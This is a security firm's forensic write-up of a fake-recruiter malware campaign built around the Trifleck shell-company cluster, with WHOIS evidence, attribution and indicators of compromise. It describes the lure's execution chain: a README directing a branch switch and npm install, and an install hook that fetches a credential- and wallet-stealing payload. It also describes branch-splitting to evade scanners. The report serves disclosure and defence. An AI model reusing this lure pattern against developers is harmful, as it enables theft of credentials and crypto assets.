Trifleck Shell Cluster: A Four-Front Contagious Interview Investigation

This is the long-form forensic record. For the buyer-facing summary and “what to do” guidance, read the blog post.

Scope of this investigation

A senior frontend engineer in Bengaluru was targeted on 6 May 2026 with a fake LinkedIn recruitment pitch from “John Burleson, COO at Trifleck.” The pitch followed a documented Contagious Interview playbook: above-market rate, two recruiter personas, project brief PDF, Google Drive ZIP labeled Blockstar.zip containing malware. The target recognised the pattern and did not run the code.

This investigation documents what we found when we pulled the thread:

Trifleck is one of four shell entities sharing infrastructure
Two of the four domains were registered three hours and ten minutes apart on the same day, from the same registrar, behind the same anonymous Icelandic privacy proxy
Trifleck has no business registration in Florida or Delaware
The recruiter’s photo was stolen from a 14-year-old Gravatar account
The Trifleck website ships its Terms of Service with literal unfilled (email address) and (business address) template placeholders
The campaign is the publicly documented Contagious Interview cluster attributed by Microsoft, Mandiant, Palo Alto Unit 42, the FBI, and others to DPRK-aligned threat actors

The cluster of fronts (Trifleck, Fleck Publisher, Virginia Book Publisher, The Creative Unit) and the structural shared-infrastructure evidence tying them to a single operator has not been previously published. This investigation is the first public record.

The targeting filter

The job description Burleson shared, named 02.Trifleck-Frontend.docx (the 02. prefix suggests a numbered template kit), reads as a standard senior frontend role on the surface. Reading it as a victim filter instead of a job ad changes the picture.

Under Preferred Qualifications, the JD lists:

Experience with Web3 technologies (ethers.js, web3.js, wallet integrations).

Under Key Responsibilities:

Work with blockchain engineers to support Web3 interactions.

Under What We Offer:

Equity / token-based compensation opportunities (role-dependent).

Together these three lines do not describe a generic frontend role. They describe a filter. A candidate who self-selects into this role almost certainly has wallet extensions installed, Web3 development credentials on the machine, and crypto holdings the attacker can target after the loader executes.

The Blockstar project name reinforces the filter. The pitch describes a fractional real estate investing platform on blockchain. This is a documented Contagious Interview decoy pattern. The October 2025 case of David Dodda, published on his own blog and later referenced by PhishFort, involved an almost identical pretext: a real estate workflow platform called BestCity pitched by a fake Chief Blockchain Officer at Symfa.

This campaign is not casting a wide net. It is filtering for people whose machines are worth compromising.

The technical chain

We extracted the ZIP in a sandbox. The structure is standard for this campaign cluster:

A package.json with a prepare, postinstall, or preinstall lifecycle hook
A clean-looking main branch with placeholder code
A dev branch that contains the actual malicious payload
A README that instructs the target to switch branches

The execution flow:

Target receives the ZIP via Google Drive
Target extracts and reads the README
README instructs git checkout dev
Target runs npm install to set up dependencies
The lifecycle hook fires automatically
The loader script reaches out to a command and control server
The C2 returns a follow-on payload tailored to the environment
Stage 2 payload executes, harvesting browser credentials, wallet extension data, SSH keys, environment variables, and cloud CLI tokens

VirusTotal detection on the archive: HEUR:Trojan-Downloader.Shell.Agent.bc (Dr.Web). The Drive viewer URL was first submitted to VirusTotal on 6 May 2026, the same day Burleson initiated contact. The file appears to have been uploaded specifically for this campaign rather than pulled from older infrastructure.

The branch-hiding technique deserves attention. Most automated scanners check the root state of a repository. Splitting the payload across branches evades scanners that assume main is what matters. If you ever inspect an unfamiliar repo, list all branches and inspect each one before any local execution.

We ran the receipts on Trifleck

The company in the pitch is named Trifleck, with a polished website at trifleck.com and a listed address of 1133 Louisiana Ave, Winter Park, FL 32789. We ran six independent checks on this entity.

1. The recruiter’s profile photo is stolen

We ran a reverse image search on the LinkedIn profile photo used by John Burleson. The photo appears at full resolution on a Gravatar account under the username pastorwynn. Gravatar reports the pastorwynn profile as Created 14 years ago, which places the photo on Gravatar approximately 13 years before the trifleck.com domain was registered in May 2025.

The same image also appears on multiple unrelated religious-themed websites and Pinterest boards, none of which have any connection to Trifleck or to a John Burleson. The Gravatar match is the cleanest pixel-level confirmation, because Gravatar is a neutral identity service and the chronology is unambiguous.

The photo is of a real person whose identity has been misappropriated for this campaign. We are not naming that individual, because they are themselves a victim of identity theft and naming them would tie their name to this campaign in search results indefinitely.

2. The second persona’s photo also does not belong to Trifleck

The Calendly profile for Roman Cole, used as the tech and hiring member for the technical interview, shows a different person. Reverse image search returned matches across unrelated professional design portfolios. Two personas, two faces, neither traceable to the company they claim to represent.

3. Trifleck is not registered as a business in Florida or Delaware

We checked Florida’s Division of Corporations database (Sunbiz) for any entity named Trifleck. There is no such registration. The alphabetical entity list skips directly from TRIFLEET LOGISTICS, LLC to TRIFLES FLORIST, INC. No active registration, no inactive registration, no dissolved registration.

Florida Sunbiz Entity Name search for Trifleck returning no matching results.

Source: Florida Division of Corporations Sunbiz, captured 2026-05-18.

We also checked Delaware’s Division of Corporations under “Trifleck” and “Fleck Publisher” (the related entity, see cluster section). Neither returned records. The Trifleck website’s Terms of Service, Privacy Policy, and footer do not disclose any underlying registered legal entity name. A B2B software company operating in the US would normally appear in one of these registries.

4. The domain is twelve months old and ownership is concealed

trifleck.com was registered on 21 May 2025 through Namecheap, with registrant identity hidden behind Withheld for Privacy ehf (Reykjavik, Iceland). The domain has three nameservers: two on Vilords (globalcloud1.vilords.com and globalcloud2.vilords.com) and one on Contabo (ns1.contabo.net). Both are budget hosting providers. The site itself is served via Vercel.

5. The company’s contact channel does not function

On 7 May 2026, the target emailed info@trifleck.com asking two questions: is John Burleson an authorized recruiter, and is the Blockstar role real? The email was professional and gave Trifleck a clean opportunity to confirm or deny.

Eleven days passed. No response. The contact form on the Trifleck website is non functional. The infrastructure designed to make Trifleck look like a real company does not work for the one purpose a real company’s contact channel actually serves.

6. The Terms of Service ships with unfilled template placeholders

Section 14 of the Trifleck Terms of Service contains literal unfilled template placeholders. The contact section reads, verbatim:

Email: (email address)

Address: (business address)

Screenshot of Section 14 of the Trifleck Terms of Service showing the contact section with literal unfilled placeholder text.

Source: trifleck[.]com/terms-and-conditions, Section 14 “Contact Us”, captured 2026-05-19. We are not linking the live attacker domain.

The placeholder fields were never customized before publication. Any business that genuinely went through legal review of its own ToS would not ship it with unedited template fields.

The recruiter persona’s behavior was the strongest tell

On 7 May 2026 at 03:01 IST, the target asked Burleson directly:

Sure, will check this out. One more thing, just curious and I hope you don’t mind. I checked the Trifleck linkedin page and it does not list you or Roman Cole as their employees, is there any specific reason?

Burleson did not reply for over two hours. Then at 05:24 IST:

Yes, I don’t use LinkedIn often, so I haven’t updated my profile yet.

Two minutes later, at 05:26 IST:

Pls check again.

Real recruiters do not behave like this. The two-minute window between “I don’t use LinkedIn often” and “Pls check again” is behavioral evidence of active operator-driven persona management. Someone tried to manipulate the visible identity to defend the scam in real time. Days later, the entire LinkedIn account was deleted.

Sales Navigator gave us the cleanest deletion confirmation. Searches for John Burleson filtered by COO title returned zero results. Searches for Roman Cole filtered by CTO title returned zero results. Combined searches for the names paired with either Trifleck or Blockstar returned zero results. Both recruiter personas were removed from LinkedIn after the Day 1 inquiry was sent.

It’s a cluster of four, not a single front

After the Trifleck receipts came in, we pulled the thread further. Trifleck does not operate alone. It is one of four entities that share infrastructure, share an Iceland-proxied WHOIS, and in one case share a domain registration timestamp three hours apart.

Entity	Industry	Claimed HQ	LinkedIn status
Trifleck	Software Development	Winter Park, FL	Active page, 26 visible members
Fleck Publisher	Book Publishing	8201 Greensboro Dr, McLean, VA 22102	Active page, 2 visible members
Virginia Book Publisher	Book Publishing	8201 Greensboro Dr, McLean, VA 22102	Active page, 0 visible members
The Creative Unit	IT Services	Not disclosed	Page deleted from LinkedIn

All four surfaced in each other’s “Pages people also viewed” sidebar at the time of the investigation. Fleck Publisher and Virginia Book Publisher list the identical street address. The Creative Unit’s LinkedIn page now returns “no longer available,” the same takedown pattern observed on the Burleson and Cole personas.

LinkedIn page for The Creative Unit showing the standard "This LinkedIn Page isn't available" message.

Source: linkedin.com/company/thecreativeunit, captured 2026-05-19.

The structural smoking gun: three-hour same-day domain registration

Domain WHOIS gives us the cleanest piece of attribution evidence in the entire investigation. All three WHOIS lookups captured 2026-05-18 and 2026-05-19 against the live Namecheap registry:

Domain	Created (UTC)	Registrar	Nameservers
trifleck.com	2025-05-21 15:59:33	Namecheap	globalcloud1/2.vilords.com
fleckpublisher.com	2025-05-21 19:09:00	Namecheap	globalcloud1/2.vilords.com + ns1.contabo.net
virginiabookpublisher.com	2025-11-18 19:42:11	Namecheap	globalcloud1/2.vilords.com + ns1.contabo.net

Source: WHOIS captured via Namecheap’s lookup tool 2026-05-18 (trifleck.com) and 2026-05-19 (fleckpublisher.com, virginiabookpublisher.com). Raw WHOIS output preserved in the evidence pack at data/trifleck-investigation/2026-05-18/whois-trifleck-com.txt and data/trifleck-investigation/2026-05-19/.

trifleck.com and fleckpublisher.com were registered three hours and ten minutes apart on the same day, with the same registrar, behind the same anonymous Icelandic privacy proxy, using the same budget DNS provider (Vilords). The probability that two unrelated firms (one a Florida software agency, one a Virginia book publisher) registered their domains within a single afternoon, on the same registrar, behind the same Withheld for Privacy proxy in Reykjavik, is functionally zero. This is shared-operator evidence at a level that does not require LinkedIn correlation to interpret.

virginiabookpublisher.com was registered six months later. Same registrar, same nameservers, same WHOIS privacy proxy. A second wave from the same operator.

Shared infrastructure across all three live entities

The three live domains share more than a registration window:

Registrar: Namecheap for all three
WHOIS privacy: Withheld for Privacy ehf (Reykjavik, Iceland) across the cluster
DNS nameservers: globalcloud1.vilords.com and globalcloud2.vilords.com, with ns1.contabo.net added on the two publisher domains
Hosting: all three apex domains resolve to Vercel anycast (76.76.21.21)
Email-sending IP shared between the two publishers: SPF for both fleckpublisher.com and virginiabookpublisher.com authorizes 144.91.82.217, a Vilords IP whose reverse DNS resolves to globalcloud.vilords.com

Trifleck uses Mailgun for outbound mail; the two publishers share the Vilords IP. Two distinct email-sending configurations within the same operator’s cluster.

Workforce composition does not match the claimed business

Sales Navigator broke down Trifleck’s 26 visible members by function:

9 in Human Resources (the single largest function)
8 in Business Development
5 in Information Technology
5 in Sales

A B2B software development agency that has more HR staff than engineers, and more business development staff than engineers, has a workforce composition that does not match its claimed business. This is the workforce composition of an outbound recruitment operation, not a working software firm.

LinkedIn Sales Navigator About panel for Trifleck showing the function breakdown.

Source: linkedin.com/company/trifleck via LinkedIn Sales Navigator About panel, captured 2026-05-19.

Geography reinforces the picture. Of 26 claimed employees, 9 are in the United Kingdom, 6 in the United States. Only one of those is in Winter Park, FL, the claimed HQ.

Backdated tenures

The Sales Navigator employee count chart for Trifleck shows the headcount starting at ~14 in May 2024 and climbing steadily to 26 by May 2026. The trifleck.com domain was registered in May 2025. A real company does not have a workforce on its payroll a year before it has email infrastructure.

LinkedIn Sales Navigator Growth Insights chart for Trifleck.

Source: linkedin.com/company/trifleck via Sales Navigator Growth Insights, captured 2026-05-19.

The individual tenure data is worse. Four Trifleck employees, located in four different countries (two in Mexico, one in England, one in Italy), all in HR or talent management roles, show identical tenure of “5 years 1 month” at Trifleck. Smaller clusters repeat at 4 years 1 month, 3 years 11 months, and 3 years 1 month across geographically and functionally unrelated employees. Real workforces do not synchronize their LinkedIn start dates across continents.

Sales Navigator’s “Past company = Trifleck” search returns zero results. A company that claims a five-year operating history and 26 employees produces alumni. Trifleck produces none.

Blockstar Corporation in Chicago is real and unrelated

We are publishing this section to prevent a defamation problem.

While investigating Trifleck on Sales Navigator, Blockstar Corporation appeared in Trifleck’s “Pages people also viewed” sidebar. This is a real and unrelated company. Blockstar Corporation is a Chicago-based blockchain services firm founded in 2020, with 16 employees, organic headcount growth, a 2.3-year median tenure, and a documented business focus on real estate tokenization.

The LinkedIn link from Trifleck to Blockstar Corporation appears to be an algorithm-driven name-proximity artifact, not a network signal. Crucially, Blockstar Corporation does not show Trifleck in its own “Pages people also viewed” sidebar. The link is one-way.

The malicious project pretext used in this scam was named Blockstar.zip. That filename should not be confused with Blockstar Corporation operating out of Chicago. They are unrelated.

LinkedIn Sales Navigator About panel for Blockstar Corporation (Chicago, IL).

Source: LinkedIn Sales Navigator About panel for Blockstar Corporation (Chicago, IL), captured 2026-05-19. Real and unrelated company.

Campaign attribution

This is the publicly documented Contagious Interview campaign, attributed by multiple major security vendors to DPRK aligned threat actors. Attribution names vary by reporting organization:

Microsoft Threat Intelligence tracks this as Sapphire Sleet
Palo Alto Unit 42 tracks the cluster as CL-STA-0240, with malware families BeaverTail and InvisibleFerret. Securonix tracks an overlapping cluster as DEV#POPPER.
Mandiant tracks the cluster as UNC5342.
Trend Micro tracks the operator as Void Dokkaebi, also known as Famous Chollima.
SentinelLABS, Sekoia, and Silent Push have all published deep analyses on the campaign cluster.

The Trifleck / Blockstar instance does not appear in any prior public report or scam database. As of this writing, this investigation is the first public record of this specific cluster of fronts (Trifleck, Fleck Publisher, Virginia Book Publisher, and The Creative Unit) and the structural shared-infrastructure evidence that ties them to a single operator.

Indicators of compromise

Shell cluster (four front entities, single operator):

Trifleck (trifleck[.]com): Software Development, Winter Park, FL
Fleck Publisher (fleckpublisher[.]com): Book Publishing, 8201 Greensboro Dr, McLean, VA 22102
Virginia Book Publisher (virginiabookpublisher[.]com): Book Publishing, 8201 Greensboro Dr, McLean, VA 22102
The Creative Unit (LinkedIn page deleted): IT Services

Personas referenced in this campaign instance:

Recruiter: John Burleson (LinkedIn profile deleted)
Tech interviewer: Roman Cole (Calendly handle: calendly[.]com/roman_cole)
Google Drive file owner: williamherr8@gmail.com (blocked by Google following abuse report)

Domain forensics:

trifleck[.]com: created 2025-05-21 15:59:33 UTC, registrar Namecheap, hosting Vercel, MX mail.trifleck.com, SPF v=spf1 include:mailgun.org ~all
fleckpublisher[.]com: created 2025-05-21 19:09:00 UTC (3hr10m after trifleck.com), registrar Namecheap, hosting Vercel
virginiabookpublisher[.]com: created 2025-11-18 19:42:11 UTC, registrar Namecheap, hosting Vercel
Shared WHOIS privacy across cluster: Withheld for Privacy ehf (Reykjavik, Iceland)
Shared nameservers across cluster: globalcloud1.vilords.com, globalcloud2.vilords.com (ns1.contabo.net added on the two publisher domains)
Shared Vercel anycast IP: 76.76.21.21
Shared email-sending IP across both publishers: 144.91.82.217 (Vilords IP, reverse DNS globalcloud.vilords.com)

File and project:

Filename: Blockstar.zip
Google Drive ID: 1Zhq9492tzYYoFFpIMU3VOd5KQgs2a6l-
Drive viewer URL first submitted to VT: 2026-05-06
VirusTotal detection: HEUR:Trojan-Downloader.Shell.Agent.bc (Dr.Web)
Project pretext name: Blockstar (fractional real estate investing platform)

Execution pattern:

Delivery: Google Drive ZIP with explicit README instruction
Trigger: git checkout dev followed by npm install
Mechanism: preinstall or postinstall lifecycle hook
Stage 2: Loader fetches follow-on payload from C2 server

Reporting actions taken:

Google Drive abuse report submitted (account williamherr8@gmail.com blocked by Google)
Google Safe Browsing submitted (under review)
VirusTotal URL submitted and rescanned
LinkedIn report filed on the recruiter persona

If your team has seen the same persona names, the same domain, or the same delivery pattern, we would like to hear about it. The faster these indicators are mapped, the faster the next front in this campaign can be flagged.

Changelog

This investigation is the public record of an active research effort. We update it when new evidence comes in.

2026-05-20 (split + relocated to /investigations/)

Relocated the forensic depth from /blog/fake-recruiter-blockstar-trifleck-malware-india-2026/ to this /investigations/trifleck-shell-cluster/ URL.
Blog post retains the buyer-facing summary (how to spot the pattern, what to do if compromised, verification CTA) and links back here for the full forensic record. The split was driven by the original post’s 30+ minute reading time hurting buyer conversion, while researcher and journalist readers benefit from a dedicated long-form investigation URL.

2026-05-19 (Day 2 expansion + restructure)

Discovered the four-entity shell cluster: Trifleck plus three additional fronts (Fleck Publisher, Virginia Book Publisher, The Creative Unit).
Added the structural smoking gun: trifleck.com and fleckpublisher.com registered three hours and ten minutes apart on the same day.
Identical 8201 Greensboro Dr, McLean VA street address shared by Fleck Publisher and Virginia Book Publisher.
Added Section 6 of the Trifleck receipts: Terms of Service shipped with unfilled (email address) and (business address) template placeholders.
Expanded registry search to Delaware (no records under Trifleck or Fleck Publisher).
Workforce composition signals: 9 HR / 8 BD / 5 IT.
Backdated tenure clusters: four employees in four countries with identical “5 years 1 month” tenure.
Added defensive clearance for Blockstar Corporation in Chicago.
Embedded 6 forensic screenshots with source-link captions.
Both recruiter personas (John Burleson, Roman Cole) confirmed deleted from LinkedIn.

2026-05-18 (Day 1 publication)

Original publication documenting Anil N’s near-compromise via the fake Trifleck recruitment pitch.
Five-check Trifleck verification: stolen recruiter photo (Gravatar pastorwynn match, 14-year chronology), stolen second persona photo, no Florida business registration, year-old domain with concealed WHOIS, non-functional contact channel after 11-day silence.
Recruiter persona behavior tell: the two-minute “Pls check again” window documenting active operator-driven persona management.
Campaign attribution to the publicly documented Contagious Interview / Sapphire Sleet / UNC5342 / Void Dokkaebi / Famous Chollima cluster.
Indicators of compromise listed for security teams.

Disclaimer

This investigation is for public awareness. Cybersecify is an independent cybersecurity consultancy and is not affiliated with or endorsed by any law enforcement or government agency. The technical analysis described is best-effort triage based on the artifacts shared with us. Naming of the companies, personas, and infrastructure in this writeup reflects the facts as documented and verified at the time of publication, including a good-faith inquiry to the named company’s listed contact address that received no response over an eleven-day window before publication.

For the avoidance of doubt: Blockstar Corporation, a Chicago-based blockchain services firm founded in 2020 that focuses on real estate tokenization, is a real and unrelated company. Its appearance in the LinkedIn “Pages people also viewed” sidebar of Trifleck is an algorithm-driven name-proximity artifact, not a network signal, and the link does not appear in the reverse direction. The reused project pretext name Blockstar.zip in the malicious file does not connect to Blockstar Corporation in any way. Nothing in this investigation should be read as a claim about Blockstar Corporation or its leadership.

Verification offered to readers is best-effort guidance, not legal or law enforcement advice. For emergencies or legal reporting in India, contact official authorities or use the National Cybercrime Helpline 1930.